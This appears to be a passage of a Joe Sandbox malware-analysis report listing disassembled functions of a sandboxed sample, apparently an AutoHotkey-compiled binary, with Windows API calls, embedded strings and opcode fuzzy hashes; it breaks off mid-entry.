Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: :$A$GetProcessImageFileNameA$psapi
API String ID: 0-3583617025
Opcode ID: 8d2855726abd26debe064bbf98a373fc40f6acadcf28a23d320790846bd5b1a6
Instruction ID: 93a721ac605d1cca80a5b0f64ba59ac3afed97513509cca6af20dca4db28fd7c
Opcode Fuzzy Hash: 8d2855726abd26debe064bbf98a373fc40f6acadcf28a23d320790846bd5b1a6
Instruction Fuzzy Hash: 5A21FB692443452BE72066255C46BFB7B88DB9275AF44007FFF8581283EEDE980D82A9

Function 0041E0A0 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 84COMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 0041E168

Strings

&|^[, xrefs: 0041E0D0
This line does not contain a recognized action., xrefs: 0041E149
, xrefs: 0041E0AF
:=+-, xrefs: 0041E0C0
(<>, xrefs: 0041E0B8
*/!~, xrefs: 0041E0C8

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy
String ID: $&|^[$(<>$*/!~$:=+-$This line does not contain a recognized action.
API String ID: 2961919466-3692006347
Opcode ID: fdd359d0e9932abbef5b9bf83aa799241686665e2632ae0d9923764e4dacbd42
Instruction ID: 676f58c6879b4eacb6e8c833a356d60fcde24bdc1c6c457cbc556eb7daaff973
Opcode Fuzzy Hash: fdd359d0e9932abbef5b9bf83aa799241686665e2632ae0d9923764e4dacbd42
Instruction Fuzzy Hash: 6821433A50839566C3219F5A5C507EBBF92DB92344F44845FECC40B303D637998EC799

Function 00432D9F Relevance: 12.2, APIs: 8, Instructions: 212COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00000000,?,00000048), ref: 00432DEA
CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00432E1C
MulDiv.KERNEL32(00000000,?,00000048), ref: 00432E42
CreateFontA.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00432E7B
MulDiv.KERNEL32(?,?,00000048), ref: 00432F33
CreateFontA.GDI32(00000000), ref: 00432F3C
MulDiv.KERNEL32(00000000,?,00000048), ref: 00432F7A
CreateFontA.GDI32(00000000), ref: 00432F83

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CreateFont
String ID:
API String ID: 1830492434-0
Opcode ID: 115129c733ce790ab273d16e8e882b9b372ea24cb8543333dd78bb513174ffdd
Instruction ID: f567c05aa3369f289b8f72b16d34b3f5b3de849edb9a28b0b4f518f3b78ed63d
Opcode Fuzzy Hash: 115129c733ce790ab273d16e8e882b9b372ea24cb8543333dd78bb513174ffdd
Instruction Fuzzy Hash: 8F711B71784341BBEB30CF25CD42F6B77E4AB88B00F50591DBA58AB2D0D6B8EC408B59

Function 00469B10 Relevance: 12.1, APIs: 8, Instructions: 100windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000019F,00000000,00000000), ref: 00469B4A
SendMessageA.USER32(?,00000198,00000000,80000000), ref: 00469B63
SendMessageA.USER32(00000000,0000100C,000000FF,00000001), ref: 00469B79
SendMessageA.USER32(?,0000100E,00000000,80000000), ref: 00469B96
SendMessageA.USER32(00000000,0000110A,00000009,00000000), ref: 00469BAC
SendMessageA.USER32(?,00001104,00000001,80000000), ref: 00469BC5
SendMessageA.USER32(?,00000419,00000000,80000000), ref: 00469BD8
GetWindowRect.USER32(?,80000000), ref: 00469BF0

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$RectWindow
String ID:
API String ID: 1944065686-0
Opcode ID: 7ec7a5478b66bb2ef8862c081798383b6523d17c1f705be96de8e0126556fece
Instruction ID: b2c6fce2dbf3b8b5ff540cef150ce0b316f186b007e62a167f74da2e9935e1d7
Opcode Fuzzy Hash: 7ec7a5478b66bb2ef8862c081798383b6523d17c1f705be96de8e0126556fece
Instruction Fuzzy Hash: A131D470108305ABD720CF28CC45F6AB7A8FF94B10F248A1EF294872D0E6F4EC458B56

Function 00436B50 Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 449COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 00436C93

Strings

Count, xrefs: 00436C2B
Col, xrefs: 00436C66
Focused, xrefs: 00436C50
Selected, xrefs: 00436C3C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64
String ID: Col$Count$Focused$Selected
API String ID: 398114495-81583591
Opcode ID: d296d729443ae8249a9d401e1d8824d531d917fa26fd8cfad9ac6900a111f689
Instruction ID: 269f99208fbc9019c4149fe2c44557b679e39fd55f4ad9996f758d645292bce5
Opcode Fuzzy Hash: d296d729443ae8249a9d401e1d8824d531d917fa26fd8cfad9ac6900a111f689
Instruction Fuzzy Hash: A1E159712483416BE720DB249C42F6BB7E4AB88714F045A2EF5D49B2C1C7BCED49C79A

Function 004414E0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 302COMMON

Download Yara Rule

APIs

__wcstoui64.LIBCMT ref: 004415A2
CloseHandle.KERNEL32(00000000,?,?,?,80000000,00000003,00000000,00000003,08000000,00000000), ref: 0044171F

Strings

Out of memory., xrefs: 00441763, 00441827

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: CloseHandle__wcstoui64
String ID: Out of memory.
API String ID: 974461613-4087320997
Opcode ID: 9f034782d4723daa3edff3462efa980cd2832c39d56034e9bb6c20ecf07cf20c
Instruction ID: c6ce0457675fa271c8707e3b111c190d1412130f3d6ca5cf30f3250ac1b2ee4c
Opcode Fuzzy Hash: 9f034782d4723daa3edff3462efa980cd2832c39d56034e9bb6c20ecf07cf20c
Instruction Fuzzy Hash: 7391AC322042002BEB10DF249C81FABBB969BC9314F58456FF9955B3D2D63E9885C76E

Function 004D07A0 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 004D08A1
__FindPESection.LIBCMT ref: 004D08BB

Strings

6D2b, xrefs: 004D099D, 004D09A0, 004D09A2

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID: 6D2b
API String ID: 876702719-3445295480
Opcode ID: af2b298b02b76ddc1e0fb8e4364ac2381e962b5e44b2a78182747b32a3d50096
Instruction ID: 1cc11156003eee4559f55cf418adae63a9d178d518896aa6ac15a8c841747575
Opcode Fuzzy Hash: af2b298b02b76ddc1e0fb8e4364ac2381e962b5e44b2a78182747b32a3d50096
Instruction Fuzzy Hash: 9991E0B6A012058FDF14CF59D8A4B6EB3A5FB84314F15816FE805973A1E739EC01CB99

Function 0040C7F0 Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 262COMMON

Download Yara Rule

APIs

Part of subcall function 0040C200: _memset.LIBCMT ref: 0040C214

_memset.LIBCMT ref: 0040C874
_strncpy.LIBCMT ref: 0040C9AA
_strncpy.LIBCMT ref: 0040CA37

Strings

Up, xrefs: 0040CA3F
@, xrefs: 0040C96A
& , xrefs: 0040C98A, 0040C9B3

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _memset_strncpy
String ID: & $ Up$@
API String ID: 3140232205-3870727058
Opcode ID: 0bde7889f25aad28f5b7afd97f0a76c1b1cf3b775fc21f9556dc7247d050e5d3
Instruction ID: 1a652822b16dd12aaa089eb67bc96b9fceaa6f7a8af54f387b079a043339e08e
Opcode Fuzzy Hash: 0bde7889f25aad28f5b7afd97f0a76c1b1cf3b775fc21f9556dc7247d050e5d3
Instruction Fuzzy Hash: 6591057124C3C5CAD721DB2494A1BABBBD25B93300F584B7BE0C1673C2E27D8949975B

Function 00435380 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 241COMMON

Download Yara Rule

Strings

ERROR, xrefs: 0043540A
D, xrefs: 004354F1
L, xrefs: 004354F6
UseErrorLevel, xrefs: 004353A4
T, xrefs: 004354FB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID:
String ID: D$ERROR$L$T$UseErrorLevel
API String ID: 0-3491031340
Opcode ID: 31d58ca12079e295c8a01fb90e9517a3155bf9773801962e54bf2367a404c48c
Instruction ID: 5a15e96fd7b2f85a6817646059ccde6467f14fab383cd03fd97e65aa21138ff7
Opcode Fuzzy Hash: 31d58ca12079e295c8a01fb90e9517a3155bf9773801962e54bf2367a404c48c
Instruction Fuzzy Hash: 2081BE711087416AEB20CF24EC41BAB7B959B99314F540A2FF5A4872C2D77EE849C39E

Function 0040C200 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 237COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0040C214
_strncpy.LIBCMT ref: 0040C3A6
_strncpy.LIBCMT ref: 0040C40C
_strncpy.LIBCMT ref: 0040C42D

Strings

Up, xrefs: 0040C439
& , xrefs: 0040C387, 0040C3AB

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy$_memset
String ID: & $ Up
API String ID: 2875120685-3258026345
Opcode ID: 37b603855d4480a1c248db3084e4f5395f327587e71ec00c131ec4db64b394ad
Instruction ID: f7243d95a2b861893788ee0ddaede94469d1bf8bb6121d260654eb526de2571b
Opcode Fuzzy Hash: 37b603855d4480a1c248db3084e4f5395f327587e71ec00c131ec4db64b394ad
Instruction Fuzzy Hash: A271E131598280CAD7259B2494D17BB7B816F43704F1883BBDDC16B3D2E67E9809939B

Function 0044CD90 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 218windowCOMMON

Download Yara Rule

APIs

__fassign.LIBCMT ref: 0044CE7F
SendMessageA.USER32(00001004,00001004,00000000,00000000), ref: 0044CEB6
SendMessageA.USER32(?,0000100C,-00000001,00000001), ref: 0044CF5C
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0044CF87
SendMessageA.USER32(?,0000102C,00000000,0000F000), ref: 0044CFA0

Strings

Col, xrefs: 0044CE79

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: MessageSend$__fassign
String ID: Col
API String ID: 2240494164-737980560
Opcode ID: f55b54458b4165e6657bd679fb2f93311ab156b5db602ec5a75a2291b617db85
Instruction ID: 2e8e55ab7a81418f69fcc3de606cd57410d80402882f48ed6fd17b90d3f700f0
Opcode Fuzzy Hash: f55b54458b4165e6657bd679fb2f93311ab156b5db602ec5a75a2291b617db85
Instruction Fuzzy Hash: 4F6128716023019BEB60CF29D8C1B677791EB89724F28056FE9948B3C1D739DC06C79A

Function 00474580 Relevance: 10.7, APIs: 7, Instructions: 171timeCOMMON

Download Yara Rule

APIs

_strncpy.LIBCMT ref: 004745A3
_strncpy.LIBCMT ref: 004745CC
_strncpy.LIBCMT ref: 00474601
_strncpy.LIBCMT ref: 00474632
_strncpy.LIBCMT ref: 00474664
_strncpy.LIBCMT ref: 00474696
SystemTimeToFileTime.KERNEL32(?,?,?,00000000,?,00000000,?,?,?,?,?,0043C9A3,00000000), ref: 00474739

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: _strncpy$Time$FileSystem
String ID:
API String ID: 1218395219-0
Opcode ID: bda858e88633c9415134543a2f8e7e6658df587a02a5f7e56ff023eb0155696e
Instruction ID: a527a3afa036593f5dda019febd07f9b0c2f7dab24659e1bb5669952422d1d8e
Opcode Fuzzy Hash: bda858e88633c9415134543a2f8e7e6658df587a02a5f7e56ff023eb0155696e
Instruction Fuzzy Hash: E651156260864066D304EB69CC419BBB3E5AFC9700F48CD1EF19A87641F73DE609836E

Function 00440C00 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 161COMMON

Download Yara Rule

APIs

__wcstoi64.LIBCMT ref: 00440C35

Part of subcall function 00489461: __wcstoi64.LIBCMT ref: 0048946D

Strings

open "%s" alias AHK_PlayMe, xrefs: 00440C9C
status AHK_PlayMe mode, xrefs: 00440C7F, 00440D66, 00440DA2
play AHK_PlayMe, xrefs: 00440D17
stopped, xrefs: 00440D78
close AHK_PlayMe, xrefs: 00440C93, 00440DC6

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __wcstoi64
String ID: close AHK_PlayMe$open "%s" alias AHK_PlayMe$play AHK_PlayMe$status AHK_PlayMe mode$stopped
API String ID: 398114495-4077410995
Opcode ID: a6adce4af664fb46c64693b18896bdac878d9d924bd7f553ee58a85449760f02
Instruction ID: 84154c2df975eec2c97fd85275d388df41d2fe7613871312e839b62172f42a6e
Opcode Fuzzy Hash: a6adce4af664fb46c64693b18896bdac878d9d924bd7f553ee58a85449760f02
Instruction Fuzzy Hash: 9A4158717C430472F624E2255C87FFB3A045BA1B14F240A3BF750691C2DAFEA49982EE

Function 00445900 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(?,00000060,00000060), ref: 00445992
__itow.LIBCMT ref: 004459A0
MulDiv.KERNEL32(?,00000060,00000060), ref: 004459DB
MulDiv.KERNEL32(?,00000060,00000060), ref: 00445A0B
_sprintf.LIBCMT ref: 00445A32

Strings

0x%Ix, xrefs: 00445A2C

Memory Dump Source

Source File: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: __itow_sprintf
String ID: 0x%Ix
API String ID: 4087599471-2288733857
Opcode ID: a193935ca7903e31ccdd70c322ae16073b0c6bb83ed075b6bc036726b72fc22d
Instruction ID: 9aabe54d92e539072388db3ce3f7f3f3c2ed47d64485cd90aba2adf832092242
Opcode Fuzzy Hash: a193935ca7903e31ccdd70c322ae16073b0c6bb83ed075b6bc036726b72fc22d
Instruction Fuzzy Hash: EF411F75604700DFFB00DF18CC80B777BA4AB8A724F4842AAE9845B393D729EC45C76A

Function 004C6FC5 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 132COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 004C7036
___crtGetStringTypeA.LIBCMT ref: 004C7061
___crtLCMapStringA.LIBCMT ref: 004C7081
___crtLCMapStringA.LIBCMT ref: 004C70A6

Strings

, xrefs: 004C700D
sL, xrefs: 004C714A

Memory Dump Source

Source File: 00000000.00000002.1759251146.00000000004B2000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1759123410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759140642.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759190988.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004A9000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759213200.00000000004AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759275355.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759294333.00000000004DD000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1759830109.0000000000D7E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd

Similarity

API ID: String___crt$Type_memset
String ID: $sL
API String ID: 1957702402-2542265805
Opcode ID: f322cf2389de7355de7745d2ea1001e551b743fe8e15434c58db46deb961f5f7
Instruction ID: 7919727ce51f3427601f274848fd85fbe873c87aa982ddb0ff8056cc27758fa9
Opcode Fuzzy Hash: f322cf2389de7355de7745d2ea1001e551b743fe8e15434c58db46deb961f5f7
Instruction Fuzzy Hash: EF4126B800475C5FDB618A258D85FFB7BEC9B05308F1844EEE58A87283D1799A458F24

Function 0045D5A3 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 127windowCOMMON

Download Yara Rule

APIs

